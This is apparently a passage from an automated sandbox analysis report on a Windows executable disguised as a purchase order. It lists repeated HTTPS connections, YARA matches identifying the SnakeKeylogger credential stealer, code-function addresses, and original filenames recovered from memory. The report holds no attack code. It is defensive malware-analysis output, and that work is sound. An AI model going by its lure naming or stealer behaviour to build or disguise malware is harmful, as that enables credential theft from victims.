                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50040 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50046 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50049 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50053 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50058 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50062 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50066 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50071 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50074 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50079 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50084 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50087 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50088 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50089 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50090 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50091 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50092 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50093 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50094 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50095 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50096 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50097 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50098 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50099 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50100 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50101 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50102 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50103 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50104 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50105 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50106 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50107 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50108 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50109 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50110 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50111 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50112 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50113 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50114 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50115 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50116 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50117 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50118 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50119 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50120 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50122 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50124 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50126 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50128 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50130 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50132 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50134 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50136 version: TLS 1.2
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0B883230 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0B883230

                  System Summary

                  barindex
                  Source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 7340, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_00F9DD140_2_00F9DD14
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_02B676C80_2_02B676C8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_02B600060_2_02B60006
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_02B600400_2_02B60040
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_02B676B80_2_02B676B8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_070203C80_2_070203C8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_070227280_2_07022728
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_070237980_2_07023798
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0710A7600_2_0710A760
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0710C4400_2_0710C440
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0710A3280_2_0710A328
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_07108FB00_2_07108FB0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_07109EF00_2_07109EF0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0710AB980_2_0710AB98
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0751A7080_2_0751A708
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_07510D460_2_07510D46
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_075135280_2_07513528
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_075100400_2_07510040
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0751A6F80_2_0751A6F8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0B8800400_2_0B880040
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0B8875900_2_0B887590
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0B8800400_2_0B880040
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0C468CB80_2_0C468CB8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0C465EF90_2_0C465EF9
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0C46DEB00_2_0C46DEB0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0C46EF300_2_0C46EF30
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0C46DEB00_2_0C46DEB0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0C46F16D0_2_0C46F16D
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0273D2784_2_0273D278
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_027353624_2_02735362
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0273A0884_2_0273A088
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0273C1474_2_0273C147
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0273C7384_2_0273C738
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0273C4684_2_0273C468
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0273CA084_2_0273CA08
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_027369A04_2_027369A0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0273E9884_2_0273E988
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_02736FC84_2_02736FC8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0273CFAB4_2_0273CFAB
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0273CCD84_2_0273CCD8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0273E97B4_2_0273E97B
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0273F98C4_2_0273F98C
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_02733E094_2_02733E09
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053581D04_2_053581D0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_05357B784_2_05357B78
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_05358FB04_2_05358FB0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_05350D394_2_05350D39
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535A9384_2_0535A938
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535E5384_2_0535E538
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535A9284_2_0535A928
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535C5584_2_0535C558
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_05350D484_2_05350D48
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535E5484_2_0535E548
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535C5484_2_0535C548
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053511A04_2_053511A0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053511904_2_05351190
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053515F84_2_053515F8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535C9E84_2_0535C9E8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053515E84_2_053515E8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535E9D84_2_0535E9D8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535C9D84_2_0535C9D8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535E9C84_2_0535E9C8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053560304_2_05356030
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535BC384_2_0535BC38
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535DC284_2_0535DC28
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535BC2A4_2_0535BC2A
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535DC194_2_0535DC19
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535FC184_2_0535FC18
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053530074_2_05353007
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053500064_2_05350006
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053530084_2_05353008
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053534604_2_05353460
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535A4604_2_0535A460
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053534504_2_05353450
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053500404_2_05350040
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535C0B74_2_0535C0B7
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053538B84_2_053538B8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535E0B84_2_0535E0B8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535E0A74_2_0535E0A7
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053504984_2_05350498
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053504894_2_05350489
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053564884_2_05356488
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053508F04_2_053508F0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053508E04_2_053508E0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053594E24_2_053594E2
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535C0C84_2_0535C0C8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053577204_2_05357720
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053553284_2_05355328
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053577104_2_05357710
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535B3184_2_0535B318
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535B3074_2_0535B307
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053523004_2_05352300
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535D3084_2_0535D308
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535F7784_2_0535F778
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_05357B694_2_05357B69
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053527584_2_05352758
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053527494_2_05352749
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_05352BB04_2_05352BB0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_05352BA04_2_05352BA0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_05358FA04_2_05358FA0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535B7A84_2_0535B7A8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535D7984_2_0535D798
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535B7984_2_0535B798
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535D7874_2_0535D787
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053557804_2_05355780
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535F7884_2_0535F788
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_05355BD84_2_05355BD8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053546204_2_05354620
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053546224_2_05354622
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_05356A184_2_05356A18
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_05356E704_2_05356E70
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_05356E724_2_05356E72
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_05354A784_2_05354A78
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535CE784_2_0535CE78
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535CE674_2_0535CE67
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535EE684_2_0535EE68
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535EE574_2_0535EE57
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_05351A504_2_05351A50
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_05351A414_2_05351A41
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053572B84_2_053572B8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_05351EA84_2_05351EA8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_05351E984_2_05351E98
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535D2F74_2_0535D2F7
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053522F04_2_053522F0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535F2F84_2_0535F2F8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_0535F2E74_2_0535F2E7
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_05354ED04_2_05354ED0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_053572C84_2_053572C8
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000000.1703117561.0000000000732000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamercnOB.exe" vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786532763.0000000005550000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003BC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003BC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
